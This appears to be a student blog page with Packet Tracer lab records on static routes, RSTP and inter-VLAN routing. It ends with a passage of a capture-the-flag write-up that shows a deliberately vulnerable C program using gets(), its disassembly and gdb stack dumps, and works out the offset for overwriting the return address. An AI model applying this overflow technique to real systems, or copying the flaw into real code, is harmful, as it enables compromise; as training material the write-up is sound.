JohnLyu's blog

Orange Juice Office, Eorzea Branch

Lab record

Initial network setup

Drag the devices into the workspace and set the PCs' IP addresses.
IP address/prefix and gateway of the 2 PCs:

PC1
192.168.1.2/24
192.168.1.1

PC2
192.168.2.2/24
192.168.2.1

Configure the router interfaces

Configure r0

Router>enable
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 192.168.1.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial2/0
Router(config-if)#ip address 192.168.3.1 255.255.255.0
Router(config-if)#no shutdown

Configure r1

Router>enable
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 192.168.2.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial2/0
Router(config-if)#ip address 192.168.3.2 255.255.255.0
Router(config-if)#no shutdown

Configure static routes on r0 and r1

On r0, manually route PC2's network (192.168.2.0/24) out of interface Serial2/0:

ip route 192.168.2.0 255.255.255.0 Serial2/0

Likewise, on r1:

ip route 192.168.1.0 255.255.255.0 Serial2/0

After configuring, check the routing table (output from r0):

Router#show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
* - candidate default, U - per-user static route, o - ODR
P - periodic downloaded static route

Gateway of last resort is not set

C 192.168.1.0/24 is directly connected, FastEthernet0/0
S 192.168.2.0/24 is directly connected, Serial2/0
C 192.168.3.0/24 is directly connected, Serial2/0
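Here is what the router does with this table. For a destination such as 192.168.2.2, it picks the most specific matching entry (the longest prefix) and sends the packet out of that entry's interface. If nothing matches and no gateway of last resort is set, the packet is dropped. Below is a minimal Python sketch of that lookup. It assumes r0's table is modeled as a list of (network, interface) pairs; `ROUTES` and `lookup` are hypothetical names for illustration, not anything IOS exposes.

```python
import ipaddress

# Hypothetical model of r0's routing table above: (destination network, exit interface)
ROUTES = [
    (ipaddress.ip_network("192.168.1.0/24"), "FastEthernet0/0"),  # C, directly connected
    (ipaddress.ip_network("192.168.2.0/24"), "Serial2/0"),        # S, static route
    (ipaddress.ip_network("192.168.3.0/24"), "Serial2/0"),        # C, directly connected
]


def lookup(dst: str):
    """Return the exit interface for dst by longest-prefix match, or None to drop."""
    addr = ipaddress.ip_address(dst)
    matches = [(net, ifc) for net, ifc in ROUTES if addr in net]
    if not matches:
        return None  # no matching route and no gateway of last resort
    _, ifc = max(matches, key=lambda m: m[0].prefixlen)
    return ifc


print(lookup("192.168.2.2"))  # Serial2/0
print(lookup("10.0.0.1"))     # None
```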

Testing

Once done, ping PC2 (192.168.2.2) from r0 and from PC1:

Router#ping 192.168.2.2

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.2.2, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/10/23 ms

C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:

Reply from 192.168.2.2: bytes=32 time=6ms TTL=126
Reply from 192.168.2.2: bytes=32 time=1ms TTL=126
Reply from 192.168.2.2: bytes=32 time=1ms TTL=126
Reply from 192.168.2.2: bytes=32 time=2ms TTL=126

Ping statistics for 192.168.2.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 6ms, Average = 2ms

Objectives

  1. Understand how the Spanning Tree Protocol works;
  2. Learn the basic configuration of the Rapid Spanning Tree Protocol (RSTP);

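Background

  1. To support computer teaching and networked office work, a school has built a computer lab and a school office area. The networks at the two sites are joined through two switches into an internal campus network. To make the network more reliable, you, as the network administrator, will interconnect the switches with 2 links. You must also configure the switches so that the network stays free of loops.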

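Technical principles

  1. The Spanning Tree Protocol (spanning-tree) lets a switched network keep redundant backup links while solving the loop problem those links would otherwise cause;
  2. STP uses the Spanning Tree Algorithm (STA) to build a loop-free tree topology over a switched network that contains loops. The algorithm logically disconnects the redundant backup links. When the primary link fails, traffic switches to the backup link automatically, so data keeps being forwarded normally.
  3. Protocol versions: STP, RSTP (Rapid Spanning Tree Protocol), and MSTP (Multiple Spanning Tree Protocol).
  4. Classic STP converges slowly: switching from a failed primary link to the backup link takes up to 50 seconds.
  5. RSTP adds two port roles to STP, the alternate port and the backup port, which back up the root port and the designated port respectively. When a root port or designated port fails, there is no 50-second convergence wait; the switch moves directly to the alternate or backup port. This is how RSTP converges in under 1 second.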
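The root election behind all this is easy to sketch. Every switch has a bridge ID made of its priority and its MAC address, and the lowest bridge ID becomes root. In PVST+/Rapid-PVST+, the VLAN number is added to the priority as the sys-id-ext. Below is a minimal Python sketch. It assumes two switches labeled `sw1`/`sw2` (hypothetical labels) carrying the two MAC addresses that appear in the `show spanning-tree` output of the lab record. `bridge_id` and `elect_root` are illustrative helpers, not a real API.

```python
def bridge_id(priority: int, vlan: int, mac: str) -> tuple[int, int]:
    """PVST+-style bridge ID: (priority + VLAN sys-id-ext, MAC as an integer)."""
    return (priority + vlan, int(mac.replace(".", ""), 16))


def elect_root(bridges: dict[str, tuple[int, str]], vlan: int) -> str:
    """Return the name of the bridge with the lowest bridge ID (tuples compare left to right)."""
    return min(bridges, key=lambda name: bridge_id(bridges[name][0], vlan, bridges[name][1]))


# name -> (configured priority, MAC address); which switch is which is an assumption
switches = {
    "sw1": (32768, "00E0.F9A2.673A"),
    "sw2": (32768, "00D0.BC2B.9D5B"),
}
print(elect_root(switches, vlan=1))  # sw2: equal priority, so the lower MAC wins

switches["sw1"] = (4096, "00E0.F9A2.673A")  # like "spanning-tree vlan 1 priority 4096"
print(elect_root(switches, vlan=1))  # sw1: the lower priority now decides
```

Lowering one switch's priority, as the `spanning-tree vlan ... priority 4096` step does, is the usual way to pin the root role to a chosen switch.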

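Procedure

  1. Create the Packet Tracer topology.
  2. STP is enabled by default. The two switches exchange BPDUs (Bridge Protocol Data Units) to elect the root switch, the root ports, and so on. This determines each port's forwarding state. Ports marked yellow in the diagram are in the blocking state.
  3. Configure RSTP.
  4. Run show spanning-tree on the switches to see the root switch and root ports.
  5. Changing a switch's spanning-tree priority with spanning-tree vlan 10 priority 4096 changes which switch is root.
  6. Test: when the primary link goes down, traffic switches to the backup link automatically, and data keeps being forwarded normally.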

Lab record

Initial network setup

Drag the devices into the workspace and set the PCs' IP addresses.
IP, mask, and gateway of the PCs:

PC1
192.168.1.2
255.255.255.0
192.168.1.1

PC2
192.168.1.3
255.255.255.0
192.168.1.1

Now shut down port fa0/1 on sw1 directly.

The connection drops for a while (about 20 s).
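The 50 seconds quoted in the principles section come from the IEEE 802.1D default timers: Max Age 20 s and Forward Delay 15 s. A port that must take over first waits for the old information to age out. It then spends one Forward Delay each in the Listening and Learning states. If the root port itself fails (a direct failure), the Max Age wait is skipped. Below is a back-of-the-envelope sketch in Python. The `stp_convergence` helper is hypothetical and ignores BPDU processing time. Packet Tracer's simulated outage (about 20 s here) need not match these figures.

```python
# IEEE 802.1D default timers, in seconds
MAX_AGE = 20
FORWARD_DELAY = 15


def stp_convergence(indirect_failure: bool) -> int:
    """Rough worst-case time before a blocked port forwards under classic STP.

    Indirect failure: stored BPDU info must age out (Max Age) first.
    Either way the port then passes through Listening and Learning,
    one Forward Delay each.
    """
    wait = MAX_AGE if indirect_failure else 0
    return wait + 2 * FORWARD_DELAY


print(stp_convergence(True))   # 50
print(stp_convergence(False))  # 30
```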

Configure RSTP

On both switches, configure Switch(config)#spanning-tree mode rapid-pvst

Check the spanning tree:

Switch#sh spanning-tree 
VLAN0001
Spanning tree enabled protocol rstp
Root ID Priority 32769
Address 00D0.BC2B.9D5B
Cost 19
Port 1(FastEthernet0/1)
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID Priority 32769 (priority 32768 sys-id-ext 1)
Address 00E0.F9A2.673A
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
Aging Time 20

Interface Role Sts Cost Prio.Nbr Type
---------------- ---- --- --------- -------- --------------------------------
Fa0/1 Root FWD 19 128.1 P2p
Fa0/2 Altn BLK 19 128.2 P2p
Fa0/3 Desg FWD 19 128.3 P2p

This confirms that RSTP is in use.

Disconnect a port again: the topology is updated immediately (in under 1 second).

Further reading: https://support.huawei.com/enterprise/zh/doc/EDOC1100094010/e6b45b04

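Objectives

  1. Learn to configure tagged VLANs (Tag VLAN) on a switch;
  2. Learn the basic configuration of a Layer 3 switch;
  3. Learn to configure VLAN routing on a Layer 3 switch;
  4. Enable communication between VLANs through a Layer 3 switch;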

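Background

A company has two main departments, Engineering and Sales, which sit in different offices. For security and ease of management, their hosts were split into VLANs, with Engineering and Sales in different VLANs. Business needs now require hosts in Sales and Engineering to reach each other and share resources. The two departments' switches are connected through a Layer 3 switch.

Technical principles

A Layer 3 switch has network-layer functionality, and it uses its routing function to let VLANs reach each other. It reads the IP address of each packet, looks up the routing table, and forwards along the selected route. Directly connected routes alone are enough for a Layer 3 switch to route between different VLANs. The switch can assign IP addresses to interfaces, and inter-VLAN connectivity is provided through SVIs (Switched Virtual Interfaces). An SVI is a virtual interface that the switch creates for a VLAN and assigns an IP address to.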
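From a host's point of view, the SVI is just the default gateway. A host delivers traffic for its own subnet directly at Layer 2 and hands everything else to the gateway. The Layer 3 switch then routes that traffic using its connected routes. Below is a minimal Python sketch of the host-side decision, using the PC addresses from the lab record below. `next_hop` is a hypothetical helper, not part of any device configuration.

```python
import ipaddress


def next_hop(src_ip: str, prefix: int, gateway: str, dst_ip: str) -> str:
    """Where a host sends a packet: straight to dst if it is on-link,
    otherwise to its default gateway (here, the SVI address)."""
    local_net = ipaddress.ip_interface(f"{src_ip}/{prefix}").network
    if ipaddress.ip_address(dst_ip) in local_net:
        return dst_ip   # same subnet / same VLAN: delivered at Layer 2
    return gateway      # other subnet: handed to the Layer 3 switch's SVI


# PC1 (VLAN 2) sending to PC3 (VLAN 2) and to PC2 (VLAN 3)
print(next_hop("192.168.1.2", 24, "192.168.1.1", "192.168.1.3"))  # 192.168.1.3
print(next_hop("192.168.1.2", 24, "192.168.1.1", "192.168.2.2"))  # 192.168.1.1
```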

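Procedure

  1. Create the Packet Tracer topology.
  2. On the Layer 2 switch, create VLAN2 and VLAN3, and assign port 2 to VLAN2 and port 3 to VLAN3.
  3. Set port fa 0/1, which connects the Layer 2 switch to the Layer 3 switch, to trunk (tagged VLAN) mode on both ends.
  4. Create VLAN2 and VLAN3 on the Layer 3 switch. At this point, verify that the hosts in VLAN2 and VLAN3 on the Layer 2 switch cannot communicate with each other.
  5. Set up inter-VLAN communication on the Layer 3 switch: create the virtual interfaces for VLAN2 and VLAN3, and assign them IP addresses.
  6. Check the Layer 3 switch's routing table.
  7. On the Layer 2 switch, set the default gateway of the hosts in VLAN2 and VLAN3 to the IP address of the corresponding virtual interface.
  8. Verify that the hosts in VLAN2 and VLAN3 on the Layer 2 switch can now communicate with each other.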

Lab record

Drag out all components, configure their IPs, and connect them.

IP, mask, and gateway of the three PCs:

PC1
192.168.1.2
255.255.255.0
192.168.1.1

PC2
192.168.2.2
255.255.255.0
192.168.2.1

PC3
192.168.1.3
255.255.255.0
192.168.1.1

Configure the Layer 2 switch and check the result:

en
conf t
vlan 2
exit
vlan 3
exit
int fa 0/2
switchport access vlan 2
int fa 0/3
switchport access vlan 3
int fa 0/1
switchport mode trunk
exit
exit
show vlan
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/4, Fa0/5, Fa0/6, Fa0/7
Fa0/8, Fa0/9, Fa0/10, Fa0/11
Fa0/12, Fa0/13, Fa0/14, Fa0/15
Fa0/16, Fa0/17, Fa0/18, Fa0/19
Fa0/20, Fa0/21, Fa0/22, Fa0/23
Fa0/24, Gig0/1, Gig0/2
2 VLAN0002 active Fa0/2
3 VLAN0003 active Fa0/3
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 0 0
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 0 0
1003 tr 101003 1500 - - - - - 0 0
1004 fdnet 101004 1500 - - - ieee - 0 0
1005 trnet 101005 1500 - - - ibm - 0 0

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------

Remote SPAN VLANs
------------------------------------------------------------------------------

Primary Secondary Type Ports
------- --------- ----------------- ------------------------------------------

This shows that the two VLANs were created and assigned to different ports.

Initial configuration of the Layer 3 switch:

en
conf t
vlan 2
exit
vlan 3
exit
int fa 0/1
switchport trunk encapsulation dot1q
switchport mode trunk
exit
int fa 0/2
switchport access vlan 2
exit
Switch>
Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#vlan 2
Switch(config-vlan)#exit
Switch(config)#vlan 3
Switch(config-vlan)#exit
Switch(config)#int fa 0/1
Switch(config-if)#switchport trunk encapsulation dot1q
Switch(config-if)#switchport mode trunk
Switch(config-if)#exit
Switch(config)#int fa 0/2
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit

Network state without routing

Now try pinging the other two PCs from PC1:

C:\>ping 192.168.1.3

Pinging 192.168.1.3 with 32 bytes of data:

Reply from 192.168.1.3: bytes=32 time=1ms TTL=128
Reply from 192.168.1.3: bytes=32 time<1ms TTL=128
Reply from 192.168.1.3: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.1.3:
Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 1ms, Average = 0ms

Control-C
^C
C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:


Ping statistics for 192.168.2.2:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Hosts in the same VLAN can ping each other; hosts in different VLANs cannot.

Configure routing on the Layer 3 switch:

ip routing
interface vlan 2
ip address 192.168.1.1 255.255.255.0
no shutdown
exit
interface vlan 3
ip address 192.168.2.1 255.255.255.0
no shutdown
exit
exit
show ip route
show vlan
Switch(config)#ip routing
Switch(config)#interface vlan 2
Switch(config-if)#ip address 192.168.1.1 255.255.255.0
Switch(config-if)#no shutdown
Switch(config-if)#exit
Switch(config)#interface vlan 3
Switch(config-if)#ip address 192.168.2.1 255.255.255.0
Switch(config-if)#no shutdown
Switch(config-if)#exit
Switch(config)#exit
Switch#show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
* - candidate default, U - per-user static route, o - ODR
P - periodic downloaded static route

Gateway of last resort is not set

C 192.168.1.0/24 is directly connected, Vlan2
C 192.168.2.0/24 is directly connected, Vlan3


Switch#show vlan
%LINK-5-CHANGED: Interface Vlan2, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan2, changed state to up

%LINK-5-CHANGED: Interface Vlan3, changed state to up

%LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan3, changed state to up

%SYS-5-CONFIG_I: Configured from console by console


VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/3, Fa0/4, Fa0/5, Fa0/6
Fa0/7, Fa0/8, Fa0/9, Fa0/10
Fa0/11, Fa0/12, Fa0/13, Fa0/14
Fa0/15, Fa0/16, Fa0/17, Fa0/18
Fa0/19, Fa0/20, Fa0/21, Fa0/22
Fa0/23, Fa0/24, Gig0/1, Gig0/2
2 VLAN0002 active Fa0/2
3 VLAN0003 active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 0 0
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 0 0
1003 tr 101003 1500 - - - - - 0 0
1004 fdnet 101004 1500 - - - ieee - 0 0
1005 trnet 101005 1500 - - - ibm - 0 0

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------

Remote SPAN VLANs
------------------------------------------------------------------------------

Primary Secondary Type Ports
------- --------- ----------------- ------------------------------------------

Network state with routing

Test pinging from PC1 to PC2 and PC3 again:

C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:

Reply from 192.168.2.2: bytes=32 time=1ms TTL=127
Reply from 192.168.2.2: bytes=32 time<1ms TTL=127
Reply from 192.168.2.2: bytes=32 time<1ms TTL=127
Reply from 192.168.2.2: bytes=32 time=1ms TTL=127

Ping statistics for 192.168.2.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 1ms, Average = 0ms

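The ping succeeds, as expected.

Summary:

The ip routing command is missing from the lab manual, but it matters a lot. Without IP routing enabled, routing on the Layer 3 switch simply does not take effect.

no shutdown is not strictly required; at least on the switch, ports are enabled by default.

The switchport trunk encapsulation dot1q command sets the trunk encapsulation to IEEE 802.1Q.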

To enable IEEE 802.1Q encapsulation of traffic on a specified subinterface, use the encapsulation dot1q command. To disable encapsulation, use the no form of this command.

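Why is 802.1Q required? On a switch that supports both ISL and 802.1Q, the trunk encapsulation defaults to negotiation ("Auto"). Such a switch rejects static trunk mode until an encapsulation is set explicitly: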

SW2(config-if)#switchport mode trunk
Command rejected: An interface whose trunk encapsulation is “Auto” can not be configured to “trunk” mode.

SW1(config-if)#switchport trunk encapsulation ?

dot1q      Interface uses only 802.1q trunking encapsulation when trunking
isl        Interface uses only ISL trunking encapsulation when trunking
negotiate  Device will negotiate trunking encapsulation with peer on interface
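With dot1q selected, each frame on the trunk carries a 4-byte 802.1Q tag inserted after the source MAC address. The tag holds a 12-bit VLAN ID. ISL, Cisco's proprietary alternative, instead wraps the entire frame. Below is a small Python sketch of the tag layout. `dot1q_tag` and `parse_vlan` are illustrative helpers, not part of any switch CLI.

```python
import struct

TPID_8021Q = 0x8100  # EtherType value that marks an 802.1Q tag


def dot1q_tag(vlan_id: int, pcp: int = 0, dei: int = 0) -> bytes:
    """Build the 4-byte tag: TPID (16 bits) | PCP (3) | DEI (1) | VLAN ID (12)."""
    if not 0 <= vlan_id <= 0xFFF:
        raise ValueError("VLAN ID must fit in 12 bits")
    tci = (pcp & 0x7) << 13 | (dei & 0x1) << 12 | vlan_id
    return struct.pack("!HH", TPID_8021Q, tci)  # network byte order


def parse_vlan(tag: bytes) -> int:
    """Extract the VLAN ID from a 4-byte 802.1Q tag."""
    tpid, tci = struct.unpack("!HH", tag)
    if tpid != TPID_8021Q:
        raise ValueError("not an 802.1Q tag")
    return tci & 0x0FFF


print(dot1q_tag(2).hex())         # 81000002
print(parse_vlan(dot1q_tag(3)))   # 3
```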

Introduction

Challenge file

Never done any kind of binary exploitation before? This should get you started. Grab some gdb or radare, turn off ASLR, forget about stack canaries, and let the fun begin.

Check the binary's security properties:

[*] babypwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments

OK, this looks very baby indeed: no ASLR, no canaries. The source code is even provided.

PIE is enabled, but ASLR is off on the server, so the load address is still fixed.

Source code

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <assert.h>
#include <openssl/md5.h>

void calc_string_md5(char *string, char md5[MD5_DIGEST_LENGTH]) {
    MD5_CTX c;
    MD5_Init(&c);
    MD5_Update(&c, string, strlen(string));
    MD5_Final(md5, &c);
}

unsigned char char_to_repr(char in) {
    if (in >= '0' && in <= '9')
        return in - '0';
    if (in >= 'a' && in <= 'f')
        return in - 'a' + 0xa;
    if (in >= 'A' && in <= 'F')
        return in - 'A' + 0xa;
    assert("not in hex digit range" && 0);
}

void hex_to_binary(char *in, unsigned char* out, size_t length) {
    size_t i;
    assert("length must be even" && (length % 2) == 0);

    length /= 2;
    for (i = 0; i < length; i++) {
        out[i] = char_to_repr(in[i * 2]) << 4 | char_to_repr(in[i * 2 + 1]);
    }
}

int check_user_hash(char* flag) {
    unsigned char user_md5[MD5_DIGEST_LENGTH * 2 + 1];
    unsigned char flag_md5[MD5_DIGEST_LENGTH];

    /* calculate MD5("CSR{...}") */
    calc_string_md5(flag, flag_md5);

    /* read user input, convert to hexadecimal */
    gets(user_md5);
    hex_to_binary(user_md5, user_md5, strlen(user_md5));

    return memcmp(flag_md5, user_md5, MD5_DIGEST_LENGTH) ? 0 : 1;
}

int main() {
    char flag[0x500];
    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stderr, 0, _IONBF, 0);

    /* read flag */
    int fd = open("flag.txt", O_RDONLY);
    assert("unable to open flag file" && fd >= 0);
    flag[read(fd, flag, sizeof(flag))] = '\0';
    close(fd);

    puts("It's easy. Give me MD5($flag), get $flag in return.");

    /* if md5 is correct, print flag */
    if(check_user_hash(flag)) {
        puts(flag);
    } else {
        puts("nope");
    }

    return 0;
}

A first guess: gets(user_md5); allows a stack overflow.

Disassembly

Let's look at its assembly:

000000000000143e
; ================ B E G I N N I N G O F P R O C E D U R E ================

; Variables:
; var_68: int64_t, -104
; var_70: int64_t, -112
; var_78: int64_t, -120
; var_80: int64_t, -128


check_user_hash:
0000000000001440 push r12 ; Begin of unwind block (FDE at 0x220c), CODE XREF=main+145
0000000000001442 mov r12, rdi
0000000000001445 push rbp
0000000000001446 sub rsp, 0x78
000000000000144a lea rbp, qword [rsp+0x80+var_70]
000000000000144f mov rdi, rbp ; argument "c" for method j_MD5_Init
0000000000001452 call j_MD5_Init ; MD5_Init
0000000000001457 mov rdi, r12 ; argument "__s" for method j_strlen
000000000000145a call j_strlen ; strlen
000000000000145f mov rsi, r12 ; argument "data" for method j_MD5_Update
0000000000001462 mov rdi, rbp ; argument "c" for method j_MD5_Update
0000000000001465 mov rdx, rax ; argument "len" for method j_MD5_Update
0000000000001468 call j_MD5_Update ; MD5_Update
000000000000146d mov rsi, rbp ; argument "c" for method j_MD5_Final
0000000000001470 mov rdi, rsp ; argument "md" for method j_MD5_Final
0000000000001473 call j_MD5_Final ; MD5_Final
0000000000001478 mov rdi, rbp ; argument "__str" for method j_gets
000000000000147b call j_gets ; gets
0000000000001480 mov rdi, rbp ; argument "__s" for method j_strlen
0000000000001483 call j_strlen ; strlen
0000000000001488 mov rsi, rbp ; argument #2 for method hex_to_binary
000000000000148b mov rdi, rbp ; argument #1 for method hex_to_binary
000000000000148e mov rdx, rax ; argument #3 for method hex_to_binary
0000000000001491 call hex_to_binary ; hex_to_binary
0000000000001496 mov rdx, qword [rsp+0x80+var_78]
000000000000149b mov rax, qword [rsp+0x80+var_80]
000000000000149f xor rdx, qword [rsp+0x80+var_68]
00000000000014a4 xor rax, qword [rsp+0x80+var_70]
00000000000014a9 or rdx, rax
00000000000014ac sete al
00000000000014af add rsp, 0x78
00000000000014b3 movzx eax, al
00000000000014b6 pop rbp
00000000000014b7 pop r12
00000000000014b9 ret

Dynamic debugging

Because the function uses rbp heavily as a scratch register, analyzing the stack statically is laborious.

Switch to gdb for dynamic debugging.

Set a breakpoint at j_gets.

At that point the stack looks roughly like this:

0x555555555478 <check_user_hash+56> mov rdi, rbp
0x55555555547b <check_user_hash+59> call gets@plt <gets@plt>

0x555555555480 <check_user_hash+64> mov rdi, rbp
0x555555555483 <check_user_hash+67> call strlen@plt <strlen@plt>

0x555555555488 <check_user_hash+72> mov rsi, rbp
0x55555555548b <check_user_hash+75> mov rdi, rbp
0x55555555548e <check_user_hash+78> mov rdx, rax
0x555555555491 <check_user_hash+81> call hex_to_binary <hex_to_binary>

0x555555555496 <check_user_hash+86> mov rdx, qword ptr [rsp + 8]
0x55555555549b <check_user_hash+91> mov rax, qword ptr [rsp]
───────────────────────────────────────[ STACK ]────────────────────────────────────────
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:0008│         0x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b760 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:0018│         0x7fffffffdcd8 ◂— 0x1032547698badcfe
04:0020│         0x7fffffffdce0 ◂— 0xf8
05:0028│         0x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:0030│         0x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:0038│         0x7fffffffdcf8 ◂— 'the-real-flag}\n'
─────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
► f 0 555555555473 check_user_hash+51
f 1 555555555176 main+150
f 2 7ffff7aa309b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 20
00:0000│ rdi rsp 0x7fffffffdcc0 ◂— 0xa /* '\n' */
01:0008│         0x7fffffffdcc8 —▸ 0x5555555580a8 (stdout@@GLIBC_2.2.5) —▸ 0x7ffff7c3b760 (_IO_2_1_stdout_) ◂— xchg dword ptr [rax], ebp /* 0xfbad2887 */
02:0010│ rsi rbp 0x7fffffffdcd0 ◂— 0xefcdab8967452301
03:0018│         0x7fffffffdcd8 ◂— 0x1032547698badcfe
04:0020│         0x7fffffffdce0 ◂— 0xf8
05:0028│         0x7fffffffdce8 ◂— 'CSR{this-is-not-the-real-flag}\n'
06:0030│         0x7fffffffdcf0 ◂— '-is-not-the-real-flag}\n'
07:0038│         0x7fffffffdcf8 ◂— 'the-real-flag}\n'
08:0040│         0x7fffffffdd00 ◂— 0xa7d67616c662d /* '-flag}\n' */
09:0048│         0x7fffffffdd08 ◂— 0x0
... ↓
0d:0068│         0x7fffffffdd28 ◂— 0x1f
0e:0070│         0x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:0078│         0x7fffffffdd38 ◂— 0x3
10:0080│         0x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:0088│         0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:0098│         0x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

Step over the call and enter a well-formed MD5, cea404648bf1504a431f48e2d7788d74, then look at the stack again:

00:0000│ rsp      0x7fffffffdcc0 ◂— 0x1be3e93037b0d224
01:0008│          0x7fffffffdcc8 ◂— 0x65eb4ac4ed908384
02:0010│ rax rbp  0x7fffffffdcd0 ◂— 'cea404648bf1504a431f48e2d7788d74'
03:0018│          0x7fffffffdcd8 ◂— '8bf1504a431f48e2d7788d74'
04:0020│          0x7fffffffdce0 ◂— '431f48e2d7788d74'
05:0028│          0x7fffffffdce8 ◂— 'd7788d74'
06:0030│          0x7fffffffdcf0 ◂— 0x0
... ↓
0e:0070│          0x7fffffffdd30 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
0f:0078│          0x7fffffffdd38 ◂— 0x3
10:0080│          0x7fffffffdd40 —▸ 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
11:0088│          0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test eax, eax
12:0090│ r12 0x7fffffffdd50 ◂— 'CSR{this-is-not-the-real-flag}\n'
13:0098│          0x7fffffffdd58 ◂— '-is-not-the-real-flag}\n'

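Our input is clearly written starting at the current rbp. From there we can compute the offset needed to reach the return-address slot:

0x7fffffffdd48 —▸ 0x555555555176 (main+150) ◂— test   eax, eax

That offset is 0x7fffffffdd48 - 0x7fffffffdcd0 = 0x78 bytes.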
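Here is the same arithmetic in Python, using the addresses from the local stack dumps above; they are specific to this local run with ASLR off. The sketch also computes the offsets of the saved r12 slot and of the flag buffer, which matter further down. The constant names are illustrative labels.

```python
# Addresses read off the local pwndbg stack dumps (ASLR off)
INPUT_BUF = 0x7FFFFFFFDCD0   # rbp: where gets() starts writing
SAVED_R12 = 0x7FFFFFFFDD40   # saved r12, later popped and passed to puts
RET_SLOT = 0x7FFFFFFFDD48    # return address into main+150
FLAG_BUF = 0x7FFFFFFFDD50    # start of the flag string in main's frame

ret_offset = RET_SLOT - INPUT_BUF
r12_offset = SAVED_R12 - INPUT_BUF
flag_offset = FLAG_BUF - INPUT_BUF

print(hex(ret_offset), hex(r12_offset), hex(flag_offset))  # 0x78 0x70 0x80
```

The result agrees with the disassembly. The buffer sits at rsp+0x10 after `sub rsp, 0x78`, and the two pushes (rbp, r12) sit above that, so the return address lies 0x78 + 0x10 - 0x10 = 0x78 bytes past the buffer.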

Analysis

Next, figure out where to return to.

Look at main's assembly:

                     loc_1193:
0000000000001193 mov rdi, r12 ; argument "__s" for method j_puts, CODE XREF=main+152
0000000000001196 call j_puts ; puts
000000000000119b jmp loc_1186

